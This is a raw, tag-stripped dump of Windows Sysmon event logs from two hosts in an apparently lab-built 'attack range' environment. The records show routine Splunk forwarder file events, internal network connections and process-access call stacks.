23542300x8000000000000000205453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:02.807{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2A0470483B36FCA64D26A4068A72FDE,SHA256=F4653D760A09E994B2C0463D46F59F49811023D1E99A085F850F396B1AE72697,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044419Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:02.732{0A5DF930-E35C-6299-1200-000000006002}1004NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=C2A46CA8BA6D919749E98A31648D0DD5,SHA256=1A42ACE9C606D31785E972DBAF216282AF315B39D16F473DEE418D51F3E83112,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044418Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:02.060{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A59E4247709C1F9CA1474C41E098493D,SHA256=82D5332B0F565568AADD2968CBD9A5573DA1FB8B0550655479A513F016E7B274,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:03.854{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B5BA2D62B07F972A276C79E97C2F3AD,SHA256=1C658DA18D787B245EB8E3AA758184D636352FE9D43E3C1DD9D7A1F974C320FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044420Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:03.154{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03F70FD6AF23CD27DBDCA7B58F88E2D1,SHA256=B27CBFAE6A19692A984F42664A9DD0D31E8E4221FAC83D62F31F6AF18FA4C278,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:04.990{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7359BE33D5A557FA21A290D99B72639A,SHA256=E943581F0D57DA0E1099BB694A514AD4EC59D5BBD2175171CE7F1F1EA6F1864C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044422Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:04.248{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4D822BE77E756721F3A50D6D32F669C,SHA256=B73686E15C203FB50F8ECC3DB1ECBDCEA6D618A32ECE014188E353E4E369C22E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044421Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:04.201{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=88764E49A9DB40FAC84C143D55B11D16,SHA256=B6040902613D67A5E021D6B0ACAF400FECE55CE1FD86E9E8FC5C745130E83807,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044424Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:03.602{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52355-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044423Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:05.341{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6B2AE2BE30441AFBD212B55E9A7B353,SHA256=91A4A981F8A9BBEFC401DB302967D57F9A62ADE32AF788906149542CD0C9DBF1,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044426Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:03.758{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52356-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x800000000000000044425Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:06.435{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5006EFC4A32E258990C3C5BA65756807,SHA256=943D90D4A77283AB9A9FA101899AA2BBBB104F22000391A3CE946E332C605F6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:06.854{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\respondent-20220603102417-228MD5=D22CF257E0732B5F4C22EC786659B3FF,SHA256=CD985CCC34CF20D24C2A0DD6C1AF3F982A03CB86FB6AC67C5C7E1BD670546944,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:06.136{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1927A71B7D55CCC19E719AD4C33CE941,SHA256=D31AEE771774438BAFCC313F95F882364893A9E3E0A00CF4111845FCB24DB971,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044427Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:07.529{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C292A76582087C464D7A5A55C1B72ED7,SHA256=19C64DC91EFB791DCB9855FBA6091FCDCB9349474BE634DE00C1839C71D41859,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:07.873{2E1864BB-E14E-6299-2800-000000005F02}2976NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-082954c374d9e9807\channels\health\surveyor-20220603102414-229MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:07.272{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C66B7B9371CA6D534864BECDC3BC6DF4,SHA256=39BD1A747AFF2495DE15016B6588CD0397DE08C8E7074CFD5F031E7502F6AE09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044428Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:08.732{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57DD04B28063745DA135FC95E88D9369,SHA256=CC53C320DA2595A0803FAD6A8ACCE3863091B3E4E2C9197FFC42CF83C60F465F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:08.303{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D80D4FDFC6BD534296DDC3478A23730,SHA256=044EBF5E64B8735913AA8911B000ACA661D0CEE9CBDEDF03A9FDF1DD972442E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:05.699{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56385-false10.0.1.12-8000- 23542300x800000000000000044429Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:09.826{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77171FFE92A500DD33235E7E4B43F29D,SHA256=8A7D6F576368ABD81F27BDC3710FE7576B0D5553CF19D9C06B9266C7AE5955D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:09.434{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A530FE4DC2C61F9728A4C798EBD030E4,SHA256=AA57C30CFC8A42ADAF83360B3404F9116B307B80E2F3A9212F7274DD069B9D67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044430Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:10.920{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24873D5A3A733A48E7E6FCA69D912F69,SHA256=CB664F1F29C0EC736B3DD111CA182A59748D3CD23E890F53CCE5EA8F836756DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:10.552{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F1948B2F61D3DD123D4DC9ADDAA0C53,SHA256=C472B8B51282FFAFC6266207A2764A60197E478251F045AC4908AF11AE17CEFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:11.602{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB5455E6847FC34D8224DE16F6CFA4E3,SHA256=26FDA319DDDB1932663DBD7F602BF28AAB005D7EF66E8B90122B626C049D60E7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044431Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:09.618{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52357-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000205465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:12.686{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63084030BED105366985D7C7DE4A6136,SHA256=A1A6BA5D558524B46E9A15C38A307F1EA41B51083419A2857E315782781F8B12,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044432Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:12.013{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99C4CED7A0D928405510636CB9E0837A,SHA256=C7BA3070BD7C3E440B5EB1A40AB33B09289940A06CEEDB549174F2FBFB747544,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:13.732{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DE82AA18FCBDA0B2367551D9F6AAC60,SHA256=04FF3E9C0F6ED7D8B8437BD8FBABB0A7D37822E9DAEE1FD584ED9568844EC726,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044433Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:13.107{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF34EB21281D0C180B177E45042C189D,SHA256=B8369F3A03DF19F01187DBF0868F3A560C5D846D4A911EA10809665135E3CDCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:14.869{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD82DCFBAE63FAF1D9E1CF101EFD2AD1,SHA256=7DA52B0C7BD64A326520C69E1F4B1AD78B0897FE76DD0E975167955FF02C6A53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044434Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:14.201{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=158535C7494CC8D1823BCF7BAD853F72,SHA256=26F29103CDD62AC905848D68494D01828C119D545B3B4673C7DCCEE84FFB72DC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:11.681{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56386-false10.0.1.12-8000- 23542300x8000000000000000205469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:15.985{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A9EFBCAD6BB0CBF47A7BFF0E7EAEECD,SHA256=57F6514BC4546038283C86C2D0D51EA279ABDCE9C72FE077F2F3E681165A3724,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044435Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:15.295{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43940C75C9DCEA56573A4251622619B5,SHA256=73B01B577881F1FE375D5A285E1BC66304C7CADAFC2A0E29C5E592571400ABEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044436Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:16.388{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABBE668E5EB7CA38D2A4D7D68C36CC57,SHA256=892CB546FDD4648D7290BC140BB7537A46C2728C3F449D2499BE377BD5B48AE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044438Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:17.482{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A65E9340AB3867AA335FD374EBEF3AC9,SHA256=D43FF31897E7F31B21AF9F2376CDD5EDE1233067C750F48348183986C08A0A5C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:17.432{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-1865-629A-5342-000000005F02}5956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:17.416{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:17.416{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:17.416{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:17.416{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-1865-629A-5342-000000005F02}5956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:17.416{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:17.416{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1865-629A-5342-000000005F02}5956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:17.417{2E1864BB-1865-629A-5342-000000005F02}5956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 